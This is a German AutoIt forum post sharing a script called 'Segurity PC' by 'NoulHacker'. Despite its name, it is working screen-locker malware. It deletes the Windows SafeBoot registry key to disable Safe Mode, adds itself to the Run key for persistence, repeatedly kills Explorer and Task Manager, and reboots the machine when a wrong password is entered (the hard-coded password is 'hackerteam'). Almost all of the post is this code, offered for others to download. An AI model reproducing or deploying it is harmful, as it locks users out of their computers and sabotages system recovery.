Nicht angemeldet.
Hier können Sie Ihre eigenen Skripte und UDF's veröffentlichen undanderen zum Download anbieten oder von anderen herunterladen
#NoTrayIcon #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_Icon=..\Mis documentos\Downloads\Mac-ska.ico #AutoIt3Wrapper_Outfile=Segurity PC.exe #AutoIt3Wrapper_Res_Comment=Segurity PC..exe #AutoIt3Wrapper_Res_Description=Segurity PC. by NoulHacker #AutoIt3Wrapper_Res_Fileversion=1.0.0.0.0 #AutoIt3Wrapper_Res_LegalCopyright=Segurity PC #AutoIt3Wrapper_Res_Field=Email|senzatielabuzunar@yahoo.com #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #include <ButtonConstants.au3> #include <EditConstants.au3> #include <GUIConstantsEx.au3> #include <StaticConstants.au3> #include <WindowsConstants.au3> RegDelete("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot","");Safe Mode RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "dll", "REG_SZ", @ScriptFullPath);Run @StartUP $Form1 = GUICreate("Security", 272, 112, -1, -1, BitOR($WS_MINIMIZEBOX,$WS_SYSMENU,$WS_DLGFRAME,$WS_POPUP,$WS_GROUP)) $Label1 = GUICtrlCreateLabel("Password!:", 24, 16, 79, 17) $Input1 = GUICtrlCreateInput("enter password", 32, 48, 121, 21) $Button1 = GUICtrlCreateButton("Ok", 168, 48, 75, 25, $WS_GROUP) GUISetState(@SW_SHOW) Dim $Form1_AccelTable[1][2] = [["{enter}", $Button1]] GUISetAccelerators($Form1_AccelTable) While 1 If ProcessExists("explorer.exe") Then;If ProcessClose("explorer.exe");Explorer Process EndIf ;While ProcessClose("taskmgr.exe");Task Manager RegDelete("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot","");Safe Mode ;Wend $nMsg = GUIGetMsg() Switch $nMsg Case $Button1 If GUICtrlRead($Input1) = "hackerteam" Then;Password Run("explorer.exe") Exit Run("explorer.exe") Else MsgBox(16,"Error","Wrong Password!") Shutdown(2) EndIf EndSwitch WEnd
Dauerhaft angemeldet bleiben?